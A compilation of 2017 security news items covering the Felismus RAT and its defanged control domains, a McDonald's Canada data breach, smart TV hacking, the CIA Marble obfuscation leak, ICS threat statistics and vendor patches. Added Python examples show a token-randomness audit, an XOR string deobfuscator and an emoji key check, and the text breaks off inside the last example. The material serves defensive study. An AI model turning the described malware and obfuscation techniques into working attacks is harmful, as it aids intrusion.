The Felismus RAT implements a self-updating capability, it is currently able to evade a large number of antivirus solutions. The malicious code implements the typical features of RATs, such as file upload, file download, file execution, and shell (cmd.exe) command execution.

The malicious code can also create text files on the infected machine.

The researchers started their investigation from available samples whose filenames mimic that of Adobe’s Content Management System (AdobeCMS.exe). These samples were detected several weeks ago, but the attacks leveraging the malware can be dated to six months earlier.

“The primary samples examined appear in the wild with filenames mimicking that of Adobe’s Content Management System [1] and offers a range of commands typical of Remote Access Tools: file upload, file download, file execution, and command execution.” reads the analysis published by Forcepoint. “Analysis shows the malware overall to be modular, well-written, and to go to great lengths to hinder both analysis efforts and the content of its communications. Its apparent scarcity in the wild implies that it is likely highly targeted. Furthermore, as discussed in this analysis, the good ‘operational hygiene’ relating to the re-use of email addresses and other similarly traceable artefacts similarly suggests the work of coordinated professionals.”

The experts are still investigating the attacks leveraging the RAT that is believed to be part of a larger campaign.

The command and control (C&C) infrastructure appears still active.

“Visiting cosecman[]com reveals what appears to be a copy of the WordPress.org website, albeit with a stylesheet error in all browsers tested.” continues the analysis.


The researchers noticed the threat actors did not reuse the email addresses to register the domains involved in their campaigns.

“The malware analysed appears to be both modular and well-written, strongly suggesting that skilled attackers are responsible, while its apparent scarcity in the wild implies that it is likely highly targeted.”concluded the analysis. “On top of this, the good ‘operational hygiene’ relating to the re-use of email addresses and other similarly traceable artefacts suggests coordinated, professional actors and, at the time of writing, there is little to link it with any known campaigns (APT-linked or otherwise),”

Typos in a folder name and in the function name ‘GetCurrtenUserName’ suggest that the authors might not be native English speakers.

The researchers discovered that the available malware samples appear to have been compiled using a December 2014 version of the open-source TDM-GCC compiler suite.

The researchers added that one of the C&C IP addresses appeared to selectively block one of the security firm’s exit IPs during research.

“If the other modules and capabilities associated with the malware remain a matter of speculation, so too do the intended target(s). Of the five domains hosted on the C&C IP address identified within this post, three – cosecman[]com, nasomember[]com, and unmailhome[]com – have potential associations with the financial services sector; however, under this theory the naming of the remaining two domains – maibars[]com and mastalib[]com – remain unexplained,” Forcepoint concludes.


95,000 job seekers affected by the McDonald’s Canada data breach
2.4.2017 securityaffairs Crime

The McDonald’s Canada career website was recently subject to a cyber-attack. Hackers stole records of 95,000 job seekers.
McDonald’s Canada confirmed that hackers have stolen the personal data of about 95,000 job seekers from its recruitment website.

The data were provided by candidates searching for a job at McDonald’s Canada since March 2014. The company has launched an investigation into the data breach that exposed job candidates’ names, addresses, emails, telephone numbers, employment histories and other personal data.

“The McDonald’s Canada (“McDonald’s”) career website (http://www.mcdonalds.ca/ca/en/careers.html or http://www.mcdonalds.ca/ca/fr/careers.html) was recently subject to a cyber-attack.” reads the data breach notification published by the company.

“As a result, the personal information of approximately 95,000 restaurant job applicants has been compromised. Applicants affected are those who applied online for a job at a McDonald’s Canada restaurant between March 2014 and March 2017. “


McDonald’s Canada has shut down the recruitment website. Fortunately, the site does not ask applicants for sensitive data such as health information, social insurance numbers or financial information.

The company confirmed that it is not aware of any abuse of the stolen data.

“The careers webpage will remain shut down until the investigation is complete and appropriate measures are taken to ensure that this type of security breach does not happen again,” continues the breach notification.


Most televisions can be hacked. Fairly easily

2.4.2017 Novinky/Bezpečnost Rizika
Smart TVs are a phenomenon of our time. It is the exception to find models in stores that do not offer an internet connection and the ability to install apps. The price of the more attractive features, however, is a greater security risk, as The Hacker News pointed out. According to the site, hackers can remotely attack the vast majority of TVs currently in use.
Few people underestimate computer security these days. The same cannot be said of televisions, even though antivirus products for these devices have been on offer for several years. Most users are probably unaware of the risks, which are nevertheless real.

In the middle of last year, for example, there was a flood of ransomware that locked the television; the cybercriminals then demanded a ransom to unlock it. The attack thus followed the same script as if an ordinary computer had been infected.

Cybercriminals are able to spread malicious code directly through the television broadcast signal. As The Hacker News pointed out, they can abuse a technology called HbbTV (Hybrid Broadcast Broadband TV). This is essentially a hybrid broadcasting technology that combines conventional television broadcasting with an internet connection.

TVs redirected to fraudulent sites
What is it used for in practice? While watching a program, for example, the viewer is offered additional information: related content such as photos, text, audio or video can be displayed directly on the TV. HbbTV also provides access to internet archives and internet TV stations.

Computer pirates can abuse this technology to redirect televisions to fraudulent sites carrying malware. Users who run no security software then have no way of noticing that something is wrong, at least until the hackers take control of their devices.

It is also important to mention that no such attack on televisions has actually taken place. Security researchers have, however, demonstrated in practice that it is by no means impossible. Given that the vast majority of modern televisions support HbbTV, the possible risks should not be underestimated.

An army of enslaved devices
Computer pirates target televisions and other internet-connected home devices quite regularly, precisely because of their weak security. This includes recorders, weather stations, cameras, thermostats, and even smart light bulbs whose color temperature can be adjusted over the network.

With a whole army of such devices at their disposal, attackers can easily knock any website offline. They simply direct so many requests at it that the server cannot handle them and collapses. That is exactly what happened last year in the attack on the French company OVH.

The OVH outages are still described as the largest DDoS attack in the history of the internet, with an intensity of 1 Tb/s. To put that in perspective, that is a load that even a number of larger domestic servers could not withstand.


Over 85% Of Smart TVs Can Be Hacked Remotely Using Broadcasting Signals
2.4.2017 thehackernews IoT

The Internet-connected devices are growing at an exponential rate, and so are threats to them.
Due to the insecure implementation, a majority of Internet-connected embedded devices, including Smart TVs, Refrigerators, Microwaves, Security Cameras, and printers, are routinely being hacked and used as weapons in cyber attacks.
We have seen IoT botnets like Mirai, possibly the biggest IoT-based malware threat that emerged late last year, cause a vast internet outage by launching massive DDoS attacks against the DNS provider Dyn, which shows how easy it is to hack these connected devices.
Now, a security researcher is warning of another IoT threat involving Smart TVs that could allow hackers to take complete control of a wide range of Smart TVs at once without having any physical access to any of them.
Researcher Shows Live Hacking Demonstration

The proof-of-concept exploit for the attack, developed by Rafael Scheel of the cyber security firm Oneconsult, uses a low-cost transmitter to embed malicious commands into rogue DVB-T (Digital Video Broadcasting — Terrestrial) signals.
Those rogue signals are then broadcast to nearby devices, allowing attackers to gain root access on the smart TVs and use them for malicious purposes, such as launching DDoS attacks and spying on end users.
Scheel gave a live hacking demonstration of the attack during a presentation at the European Broadcasting Union (EBU) Media Cyber Security Seminar, saying that about 90 percent of the smart TVs sold in recent years are potential victims of similar attacks.
Scheel's exploit relies on a transmitter based on DVB-T, a transmission standard that is built into TVs that are connected to the Internet.
The attack exploits two known privilege escalation vulnerabilities in the web browsers running in the background on the TV; once the device is compromised, attackers could connect to it remotely over the Internet and take complete control of it.
Once compromised, the TV is infected in such a way that neither a device reboot nor a factory reset would help the victim get rid of the infection.

Scheel's exploit is unique and much more dangerous than any smart TV hack we have seen so far.
Previous Smart TV hacks, including Weeping Angel (described in the CIA leaked documents), required physical access to the targeted device or relied on social engineering, which exposes hackers to the risk of being caught as well as limits the number of devices that can be hacked.
However, Scheel's exploit eliminates the need for hackers to gain physical control of the device and can work against a vast majority of TV sets at once.
The hack once again underlines the risks of "Internet of Things" devices. IoT devices are growing rapidly and changing the way we use technology, which drastically expands the attack surface; viewed from an information security standpoint, the IoT can be frightening.


German Military to Launch the Bundeswehr’s new Cyber and Information Space Command
2.4.2017 securityaffairs  BigBrothers

Today the German Military is going to launch a cyber command, the Bundeswehr’s new Cyber and Information Space (CIR) Command, a structure that is considered strategic for the defence of the country from cyber attacks.

According to the new commander, Lieutenant General Ludwig Leinhos, Germany is taking a leading role among the members of the NATO alliance.

“Leinhos said the main tasks would be to operate and protect the military’s own IT infrastructure and computer-assisted weapons systems, as well as surveillance of online threats.” reported the Reuters agency.

The German Government intends to protect its critical infrastructure and its assets from cyber attacks. The German military fears cyber espionage and sabotage.

The Bundeswehr’s new Cyber and Information Space (CIR) Command will be composed of 260 IT specialists, but the Government plans to increase its staff to 13,500 military and civilian personnel by July.

General Ludwig Leinhos confirmed that the centre will be tasked with developing offensive cyber capabilities.

“He said the centre would also develop and war-game offensive capabilities because ‘in order to be able to defend yourself, you have to know the options for attack’,” Reuters continues.

Operations conducted by the Cyber and Information Space (CIR) Command would have to be approved by the German Parliament, which means that cyber operations are treated the same as conventional military missions.

The creation of the centre is a response to the numerous attacks suffered by the German Government; last year the Bundestag was hit by numerous attacks.


In June, German media reported that Bundestag may need to replace 20,000 computers after hackers breached the Bundestag systems.

According to Der Spiegel magazine, security experts involved in the investigation of the attack against the Bundestag suspect that the hack was part of a large-scale espionage campaign conducted by Russian state-sponsored hackers.

The German defense ministry said that in the first nine weeks of 2017, the IT systems of the Bundeswehr had been hit by more than 280,000 attacks.

“we are in a constant race between the development of attack options and defensive capabilities” concluded Leinhos.


WikiLeaks Reveals the Marble framework, used by the CIA to make attribution harder
2.4.2017 securityaffairs BigBrothers

WikiLeaks has published the third batch of Vault7 documents, dubbed Marble, which reveals the CIA’s anti-forensics tool, the Marble Framework.
WikiLeaks released the third batch of the CIA Vault7 archive, which sheds light on the anti-forensics tools used by the intelligence agency.

The first tranche of CIA documents from Vault7 was related to hacking tools and techniques, while the second batch included detailed info about hacking tools specifically designed to hack SmartTV, Android handhelds, Apple iPhones, Macs and Windows systems.

This third lot of documents, dubbed Marble, contains the 676 source code files of the secret anti-forensic Marble Framework.

The CIA developed the Marble Framework to hamper forensic analysis of its malicious code.

The code used by the CIA was able to evade detection by implementing various techniques; for example, it can detect whether it is running in a virtual machine sandbox.

The Marble platform makes attribution of attacks harder; the documents show how the CIA could conduct a cyber attack in a way that experts would attribute to other countries, including Russia, China, North Korea and Iran.

“Today, March 31st 2017, WikiLeaks releases Vault 7 “Marble” — 676 source code files for the CIA’s secret anti-forensic Marble Framework. Marble is used to hamper forensic investigators and anti-virus companies from attributing viruses, trojans and hacking attacks to the CIA.” reads Wikileaks.

“Marble does this by hiding (“obfuscating”) text fragments used in CIA malware from visual inspection. This is the digital equivalent of a specialized CIA tool to place covers over the English language text on U.S. produced weapons systems before giving them to insurgents secretly backed by the CIA.”


The CIA Marble Framework platform includes algorithms that insert multiple strings in various languages into the malware source code to make attribution harder. Using such techniques, malware authors try to trick victims into believing that the malware was developed by American/English-speaking virus writers (VXers).

“The source code shows that Marble has test examples not just in English but also in Chinese, Russian, Korean, Arabic and Farsi.” continues Wikileaks. “This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion, but there are other possibilities, such as hiding fake error messages.”

Marble Framework does not contain any vulnerabilities or exploits.

The Marble dump also includes a deobfuscator to reverse the CIA’s text obfuscation; using it, experts can identify patterns in attacks conducted by the CIA and attribute previous hacking attacks and malicious code to the agency. Marble was in use at the CIA during 2016; in 2015 the cyber spies were using version 1.0.


Threat Landscape for Industrial Automation Systems, H2 2016
1.4.2017 Kaspersky ICS

The Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT) is starting a series of regular publications about our research devoted to the threat landscape for industrial organizations.

All statistical data used in the report was obtained using Kaspersky Security Network (KSN), a distributed antivirus network. Data was received from those KSN users who consented to have their data collected anonymously.

The research carried out in the second half of 2016 by Kaspersky Lab ICS CERT experts clearly demonstrates a number of trends in the evolution of industrial enterprise security.

On average, in the second half of 2016 Kaspersky Lab products across the globe blocked attempted attacks on 39.2% of protected computers that Kaspersky Lab ICS CERT classifies as being part of industrial enterprise technology infrastructure.

This group includes computers that run Windows and perform one or more of the following functions:

Supervisory Control and Data Acquisition (SCADA) servers,
Data storage servers (Historian),
Data gateways (OPC),
Stationary engineer and operator workstations,
Mobile engineer and operator workstations,
Human Machine Interface (HMI).
The group also includes the computers of external third-party contractors, SCADA vendors and system integrators, as well as those of internal SCADA administrators.

Every month, an average of one industrial computer in five (20.1%) is attacked by malware. We have seen stable growth in the percentage of industrial computers attacked since the beginning of our observations, highlighting the importance of cybersecurity issues.

 

Percentage of industrial computers attacked by month (second half of 2016)

Isolation of industrial networks can no longer be considered an effective protective measure. The proportion of malware infection attempts involving portable media, infection of backup copies, use of sophisticated schemes for transferring data from isolated networks in complex attacks – all of this demonstrates that risks cannot be avoided by simply disconnecting a system from the Internet.
 

Sources of threats blocked on industrial computers (second half of 2016)

Remarkably, there is very little difference between the rankings of malware detected on industrial computers and those of malware detected on corporate computers. We believe that this demonstrates the absence of significant differences between computers on corporate networks and those on industrial networks in terms of the risk of chance infections. However, it is obvious that even a chance infection on an industrial network can lead to dangerous consequences.
 

Distribution of industrial computers attacked by classes of malware used in attacks (second half of 2016)

According to our data, targeted attacks on companies in different industrial sectors are increasingly common. These are organized attacks that can target one enterprise, several enterprises, companies in one industrial sector or a broad range of industrial enterprises.

The Kaspersky Lab ICS CERT detected a series of phishing attacks which began no later than June 2016 and which are still active. The attacks target primarily industrial companies – metallurgical, electric power, construction, engineering and others. We estimate the number of companies attacked at over 500 in more than 50 countries around the world.

None of the malicious programs used in the attack – trojan spies and backdoors from different families, such as ZeuS, Pony/FareIT, Luminosity RAT, NetWire RAT, HawkEye, and ISR Stealer – are unique to this malicious campaign. They are all very popular among cybercriminals. However, these programs are packed with unique modifications of VB and MSIL packers that are used only in this attack. Our experience of investigating targeted attacks shows that cyberespionage is often used to prepare subsequent attack stages.

One quarter of all targeted attacks uncovered by Kaspersky Lab in 2016 were aimed, among other targets, at various industries – machine building, energy, chemicals, transport and others.

In 2016, Kaspersky Lab evaluated the current state of the IT security components in the industrial control systems of different vendors. As a result of this research, 75 vulnerabilities were identified in ICS components. 58 of them were classified as the most critical vulnerabilities (CVSS v3.0 severity score of 7.0 or higher).

 

Distribution of vulnerabilities uncovered by Kaspersky Lab in 2016 according to the ways in which they can be used

Of the 75 vulnerabilities identified by the middle of March 2017 by Kaspersky Lab, industrial software vendors closed 30.

The approach of industrial software vendors to closing vulnerabilities, and the situation with fixing known vulnerabilities at enterprises, are by no means reassuring. The handling of vulnerabilities as part of the software development cycle has not yet been sufficiently refined: vendors do not prioritize the closing of identified vulnerabilities based on their severity, and they prefer to fix vulnerabilities in the next release of their product rather than releasing a fix or patch that is critical from an IT security viewpoint.

Another issue is the installation of updates and security patches at enterprises. Based on our research and ICS IT security audits, we believe that for ICS owners, the process of installing critical updates is either too labor-intensive or not a high-priority task in the system’s overall lifecycle. As a result, at some enterprises critical updates of various industrial system components are not installed for years, making these enterprises vulnerable in the event of cyberattacks.

The industrial network is increasingly similar to the corporate network – both in terms of usage scenarios and in terms of technologies used. New technologies are being used that improve process transparency and efficiency at the enterprise level, as well as providing flexibility and fault tolerance of the functions performed at medium and lower industrial automation levels. The upshot of all this is that the cyber threat landscape for industrial systems is increasingly similar to the threat landscape for corporate networks. Consequently, we can expect not only the emergence of new threats specifically designed for industrial enterprises but also the evolution of existing, traditional IT threats, which involves their adaptation for attacks against industrial enterprises and physical world objects.

The emergence of large-scale malicious campaigns targeting industrial enterprises indicates that black hats see this area as promising. This is a serious challenge for the entire community of industrial automation system developers, owners and operators of such systems, and security vendors. We are still remarkably languid and slow-moving in most cases, which is fraught with dangers under the circumstances.


WikiLeaks Reveals 'Marble' Source Code that CIA Used to Frame Russia and China
1.4.2017 thehackernews BigBrothers
WikiLeaks published hundreds of more files from the Vault 7 series today which, it claims, show how CIA can mask its hacking attacks to make it look like it came from other countries, including Russia, China, North Korea and Iran.
Dubbed "Marble," the part 3 of CIA files contains 676 source code files of a secret anti-forensic Marble Framework, which is basically an obfuscator or a packer used to hide the true source of CIA malware.
The CIA's Marble Framework tool includes a variety of different algorithms, with foreign language text intentionally inserted into the malware source code to fool security analysts and falsely attribute attacks to the wrong nation.
The leaked files indicate that the Marble's source code includes Chinese, Russian, Korean, Arabic and Farsi languages, as well as English, which shows that the CIA has engaged in clever hacking games.
"Marble is used to hamper[ing] forensic investigators and anti-virus companies from attributing viruses, trojans and hacking attacks to the CIA," says the whistleblowing site.
"...for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion," WikiLeaks explains.
The released source code archive also contains a deobfuscator to reverse CIA text obfuscation.

Since the Marble framework has now been made public, forensic investigators and anti-virus firms would be able to connect patterns and missing dots in order to reveal wrongly attributed previous cyber attacks and viruses.
So far, Wikileaks has revealed the "Year Zero" batch which uncovered CIA hacking exploits for and security bugs in popular hardware and software, and the "Dark Matter" batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs.
While WikiLeaks suggests that Marble was in use as recently as 2016, the organization does not provide any evidence to back this claim. Experts are still analyzing the Marble release, so there's no need to get too excited at this moment.
The White House has condemned the revelations made by Wikileaks, saying that those responsible for leaking classified information from the agency should be held accountable by the law.


Job Seekers' Data Stolen in Hack of McDonald's Canada

1.4.2017 securityweek Crime

McDonald's Canada said Friday hackers stole the personal data of about 95,000 job seekers from the fast food chain's recruitment website over the past three years.

The data was from people who had sought work with the company since March 2014, and the company said it has launched an investigation into the hack.

The web portal targeted in the attack, which has been shut down, collected job candidates' names, addresses, emails, telephone numbers, employment histories and other relevant data, the company said in a statement.

More sensitive data such as health information, social insurance numbers and banking information is not collected during the recruiting process and was not affected, the company said.

There were no signs so far that the stolen information had been misused, the company said, and apologized to those affected.

"The careers webpage will remain shut down until the investigation is complete and appropriate measures are taken to ensure that this type of security breach does not happen again," the statement said, asking future job seekers to apply in person.


German Military to Launch Cyber Command

1.4.2017 securityweek  BigBrothers

Germany's armed forces Saturday launch a cyber command, with a status equal to that of the army, navy and air force, meant to shield its IT and weapons systems from attack.

Military planners fear that wars of the future will start with cyber attacks against critical infrastructure and networks, extensive online espionage and sabotage. The Bundeswehr's new Cyber and Information Space (CIR) Command, based in the former West German capital of Bonn, will start off with 260 IT specialists but grow to 13,500 military and civilian personnel by July.

With the new digital force, Germany is taking a leading role among NATO allies, its new commander, Lieutenant General Ludwig Leinhos, told news weekly Focus.

Leinhos said the main tasks would be to operate and protect the military's own IT infrastructure and computer-assisted weapons systems, as well as surveillance of online threats.

He said the centre would also develop and war-game offensive capabilities because "in order to be able to defend yourself, you have to know the options for attack".

However, any full-scale cyber attacks abroad would have to be approved by the German parliament, just like any other military mission.

The security of national and government IT systems, meanwhile, remains the responsibility of the interior ministry which oversees the domestic security agency that handles counterespionage.

The German government has been sensitized to cyber security since the parliament was attacked last year, with security sources suspecting Russian hackers behind the attack.

Defense Minister Ursula von der Leyen had announced the creation of the cyber command two years ago to protect the military from increasing numbers of online attacks.

The defense ministry said that in this year's first nine weeks alone, the IT systems of the Bundeswehr had been targeted more than 280,000 times.

Leinhos said that "we are in a constant race between the development of attack options and defensive capabilities".


Schneider Electric Patches Flaws in Modicon, Wonderware Products

31.3.2017 securityweek Vulnerebility
Schneider Electric has released software and firmware updates to address several vulnerabilities affecting some of the company’s Wonderware and Modicon products.

According to advisories released by Schneider Electric and ICS-CERT, the Access Anywhere extension of the Wonderware InTouch HMI visualization software is affected by four medium and high severity vulnerabilities.

The list includes a cross-site request forgery (CSRF) on the Gateway component (CVE-2017-5156), an information disclosure flaw that could lead to the exposure of credentials (CVE-2017-5158), and a weakness related to the use of outdated cipher suites and improper verification of SSL certificates (CVE-2017-5160).

The fourth vulnerability, only mentioned in Schneider’s advisory, has been described as a flaw that allows an attacker to escape remote InTouch applications and launch other processes.

The security holes affect Wonderware InTouch Access Anywhere 2014 R2 SP1b (11.5.2) and prior, and they have been addressed with the release of Wonderware InTouch Access Anywhere 2017 (17.0.0). The vendor has also provided recommendations for mitigating the vulnerabilities.

Three medium and high severity vulnerabilities have also been identified in Schneider Electric’s Modicon programmable logic controllers (PLCs).

The flaws are related to the exposure of login credentials during transmission (CVE-2017-6028), predictable authentication cookies (CVE-2017-6026), and insufficiently random TCP initial sequence numbers (CVE-2017-6030). Schneider Electric has published separate advisories for each of the issues.

The security holes affect Modicon M221, M241 and M251 PLCs. The vendor has released firmware updates that address the weaknesses related to insufficiently random values, and provided recommendations for reducing the risk of exploitation for the credentials protection vulnerability.
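Predictable session cookies and weak TCP initial sequence numbers are both instances of the same defect: a value that must be unguessable is derived from a counter or clock. The Python below is an added auditor's example, not Schneider's code and not derived from the advisories, of how to measure that weakness. It mints tokens from a deliberately weak counter-based generator and from the OS CSPRNG, then counts how many bit positions actually vary across a sample; bits that never change contribute nothing to unpredictability. The names weak_token, strong_token and varying_bits and the 16-byte token width are assumptions for this illustration.

```python
import secrets


def weak_token(counter: int) -> bytes:
    """Constructed example of a weak generator: a 16-byte token that is really just a
    counter (a time stamp or sequence number, the predictable-cookie class of bug)."""
    return counter.to_bytes(16, "big")


def strong_token() -> bytes:
    """16 bytes from the OS CSPRNG, the correct way to mint session identifiers."""
    return secrets.token_bytes(16)


def varying_bits(tokens: list) -> int:
    """Number of bit positions that take both the value 0 and the value 1 somewhere in
    the sample. This bounds the effective entropy from above: 128-bit tokens with only
    11 varying bits can take at most 2**11 distinct values, however long they look."""
    width = len(tokens[0]) * 8
    mask = (1 << width) - 1
    seen_one, seen_zero = 0, 0
    for token in tokens:
        value = int.from_bytes(token, "big")
        seen_one |= value             # positions that were 1 in some token
        seen_zero |= (~value) & mask  # positions that were 0 in some token
    return bin(seen_one & seen_zero).count("1")


def audit(tokens: list, threshold: float = 0.9) -> bool:
    """Pass when at least `threshold` of the token width actually varies. A sample of
    64 tokens cannot prove randomness, but a low result is conclusive evidence of a
    structured (and therefore guessable) generator."""
    width = len(tokens[0]) * 8
    return varying_bits(tokens) >= threshold * width


if __name__ == "__main__":
    # Constructed samples: 64 consecutive counter values versus 64 CSPRNG tokens.
    weak = [weak_token(c) for c in range(1000, 1064)]
    strong = [strong_token() for _ in range(64)]
    print("weak generator:  ", varying_bits(weak), "of 128 bits vary; passes audit:", audit(weak))
    print("strong generator:", varying_bits(strong), "of 128 bits vary; passes audit:", audit(strong))
```

The counter-based sample spans 1000 to 1063, so only the low 11 bit positions ever change; the same measurement applied to a captured set of real cookies or sequence numbers is the quickest way to confirm a finding of this kind before reading the firmware.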

In early March, Schneider also released an advisory to warn customers of a flaw that can be exploited to execute arbitrary commands on Modicon PLCs.

The company also informed users this month about a high severity denial-of-service (DoS) vulnerability affecting the Flexera FlexNet Publisher component used in the Schneider Electric Floating License Manager. This license manager is used by both the PowerSCADA Expert and PlantStruxure PES products.


WikiLeaks Releases CIA Tool Used to Impede Malware Attribution

31.3.2017 securityweek BigBrothers
WikiLeaks has released information and source code for a framework allegedly used by the U.S. Central Intelligence Agency (CIA) to make analysis of its tools and attribution more difficult.

The whistleblower organization on Friday made public 676 source code files of the Marble Framework. According to WikiLeaks, version 1.0 of the framework was released in 2015, and the CIA has continued using it during 2016.

Files that appear to be part of the official Marble Framework documentation describe it as a framework “designed to allow for flexible and easy-to-use obfuscation when developing tools.” These types of techniques have been used by many malware developers to hinder researchers.

The first round of Vault 7 files released by WikiLeaks showed that the CIA learned from the NSA’s mistakes after the intelligence agency’s Equation Group was exposed by security researchers. CIA employees apparently determined that the use of custom cryptography was one of the NSA’s biggest mistakes, as it allowed researchers to link different pieces of malware to the same developer.

The Marble framework allows obfuscation of a tool using a random technique to prevent forensics investigators and security vendors from linking it to a specific developer. Marble users can also select the algorithm they want to use or configure the application to omit certain algorithms.

Charles R. Smith, CEO of Softwar Inc, pointed out that Marble leverages the Bouncy Castle cryptography APIs.

During its analysis of the Marble source code, WikiLeaks identified test examples written in Chinese, Russian, Korean, Arabic and Farsi, which suggests that the agency may have used the framework to trick investigators into believing that its tools were developed by individuals speaking one of these languages.


“This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion,” WikiLeaks said. “But there are other possibilities, such as hiding fake error messages.”

The source code files made available by WikiLeaks also include a deobfuscation tool.

WikiLeaks has offered to share the exploits it has obtained with tech firms, but many companies have not agreed to the organization’s conditions. U.S. officials also hinted that using the leaked information could have legal repercussions.

While the available information has led to the discovery of some zero-day vulnerabilities, cybersecurity vendors and other tech companies determined that many of the flaws have already been patched. Last week, WikiLeaks published files focusing on Mac and iPhone exploits, but Apple claimed most of the security holes had been addressed.

The CIA has refused to comment on the authenticity of the leaked documents. However, the agency pointed out that its mission is to collect intelligence from overseas entities, and claimed that it does not spy on individuals in the U.S.
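The three Marble items above (securityaffairs, The Hacker News and SecurityWeek) describe the same mechanism from the analyst's side: text fragments in a binary are obfuscated so that they cannot be read by inspection, and a deobfuscator reverses that. The Python below is an added educator's example, not code from the Marble leak, from WikiLeaks or from any of the three outlets. It assumes a toy single-byte XOR obfuscation (the real framework's algorithms are not reproduced here), builds a constructed sample blob containing one plaintext string and one obfuscated string, and recovers both by trying every key and keeping only runs that look like text. The letter-ratio filter handles a common false positive: lower-case text XORed with a key in the 0x40 to 0x5F range lands on printable digits and punctuation and would otherwise be reported as a hit.

```python
# Printable ASCII range used to spot candidate strings (no control characters).
PRINTABLE = set(range(0x20, 0x7F))


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (the toy obfuscation scheme assumed here)."""
    return bytes(b ^ key for b in data)


def printable_runs(data: bytes, min_len: int) -> list:
    """Split data into maximal runs of printable ASCII at least min_len bytes long."""
    runs, current = [], bytearray()
    for b in data:
        if b in PRINTABLE:
            current.append(b)
            continue
        if len(current) >= min_len:
            runs.append(current.decode("ascii"))
        current = bytearray()
    if len(current) >= min_len:
        runs.append(current.decode("ascii"))
    return runs


def looks_like_text(s: str, min_alpha: float = 0.5) -> bool:
    """Reject runs that are printable by accident: require at least half letters.
    Lower-case text XORed with 0x40..0x5F maps into 0x20..0x3F, which is printable
    but consists almost entirely of digits and punctuation."""
    return sum(c.isalpha() for c in s) / len(s) >= min_alpha


def recover_xor_strings(blob: bytes, min_len: int = 8) -> dict:
    """Brute-force all 256 single-byte keys and return {key: [strings]} for every key
    that reveals text. Key 0 is the unmodified view, so plaintext strings appear there."""
    found = {}
    for key in range(256):
        runs = [r for r in printable_runs(xor_bytes(blob, key), min_len) if looks_like_text(r)]
        if runs:
            found[key] = runs
    return found


# Constructed sample blob: filler bytes (all >= 0x80, never printable under key 0 or
# 0x5A), a plaintext string, and a string hidden with the toy XOR scheme under key 0x5A.
FILLER = bytes([0xFF, 0xFE, 0x80, 0x90, 0xA0, 0xB0, 0xC0, 0xD0]) * 2
PLAINTEXT = b"GET /index.html"
HIDDEN = b"http://example.invalid/beacon"  # constructed placeholder, not a real indicator
KEY = 0x5A
SAMPLE_BLOB = FILLER + PLAINTEXT + FILLER + xor_bytes(HIDDEN, KEY) + FILLER


if __name__ == "__main__":
    for key, strings in sorted(recover_xor_strings(SAMPLE_BLOB).items()):
        print(f"key 0x{key:02x}: {strings}")
```

Run on the sample, key 0x00 yields only "GET /index.html" and key 0x5A yields only the hidden URL; the 29 printable bytes that the obfuscated string happens to produce under key 0x00 are dropped by the letter-ratio check. Real obfuscators use longer keys and per-string transforms, so a production deobfuscator keys on the framework's specific routine, but the scoring approach is the same.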


Telegram Messenger Adds AI-powered Encrypted Voice Calls
31.3.2017 thehackernews Privacy

Joining rival chat apps WhatsApp, Viber, Facebook Messenger and Signal, the Telegram instant messaging service has finally rolled out a much-awaited feature in the new beta versions of its Android app: voice calling.
And what's interesting? Your calls will be secured with emoji, and call quality will be improved using artificial intelligence.
No doubt the company brought the audio calling feature quite late, but it's likely because of its focus on security — the voice calls on Telegram are by default based on the same end-to-end encryption methods as its Secret Chat mode to help users make secure calls.
Unlike Signal or WhatsApp, Telegram does not support end-to-end encryption by default; instead, it offers a 'Secret Chat' mode, which users have to enable manually, to completely secure their chats from prying eyes.
However, the voice calling feature in Telegram supports end-to-end encryption by default, enabling users to secure their chats in a way that no one, not even Telegram or law enforcement, can intercept your calls.
Emoji-Based Secure Key Exchange Mechanism
Telegram features an interesting key exchange mechanism to authenticate users and make sure their calls are even more secure: users are required only to compare four emoji.
While making a call, you will see four emoji on your screen, and so will the recipient. If the emoji on your screen match the recipient's, your connection is secure!
"The key verification UI we came up with in 2013 to protect against man-in-the-middle attacks served well for Telegram (and for other apps that adopted it), but for Calls, we needed something easier," Telegram said in a blog post published Thursday.
"That's why we've improved the key exchange mechanism. To make sure your call is 100% secure, you and your recipient just need to compare four emoji over the phone. No lengthy codes or complicated pictures!"
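To see why comparing four emoji defeats a man-in-the-middle, the following Python, an added illustration rather than Telegram's own implementation, derives a short authentication string from a Diffie-Hellman shared key and shows that an interceptor who terminates two separate key agreements leaves the two phones displaying different emoji. The toy group (P = 2^127 - 1, G = 5), the 32-entry emoji table and the SHA-256-based mapping are assumptions for the demo; Telegram's real group, key derivation and emoji list differ.

```python
import hashlib

# Toy Diffie-Hellman parameters, constructed for illustration only: 2**127 - 1 is a
# Mersenne prime, but a 127-bit group is far too small for real use.
P = 2**127 - 1
G = 5

# Constructed emoji table. 32 entries divide 256 evenly, so indexing by a byte
# modulo the table size does not bias the selection.
EMOJI = [
    "🍎", "🍋", "🍇", "🍓", "🐶", "🐱", "🐭", "🐸",
    "🐼", "🐧", "🦊", "🐢", "🚗", "🚀", "🚲", "🛶",
    "⚽", "🎲", "🎸", "🎯", "🔑", "🔒", "🔔", "📌",
    "💡", "🧭", "🌙", "⭐", "🍀", "🌵", "🏠", "⛵",
]


def dh_public(private: int) -> int:
    """Public value g^x mod p sent over the (untrusted) network."""
    return pow(G, private, P)


def dh_shared(private: int, peer_public: int) -> bytes:
    """Shared secret (peer_public^x mod p) as 16 bytes; P < 2**128 so it always fits."""
    return pow(peer_public, private, P).to_bytes(16, "big")


def sas_emoji(shared_key: bytes, count: int = 4) -> tuple:
    """Short authentication string: hash the agreed key and map the first `count`
    digest bytes onto the emoji table. Both ends compute this locally and read it aloud."""
    digest = hashlib.sha256(shared_key).digest()
    return tuple(EMOJI[b % len(EMOJI)] for b in digest[:count])


def simulate_call(alice_priv: int, bob_priv: int, mallory_priv: int = None) -> tuple:
    """Return (emoji Alice sees, emoji Bob sees).

    Without mallory_priv the two parties agree on one key and see identical emoji.
    With it, an active interceptor replaces each side's public value with their own,
    so Alice and Bob each share a key with Mallory rather than with each other, and
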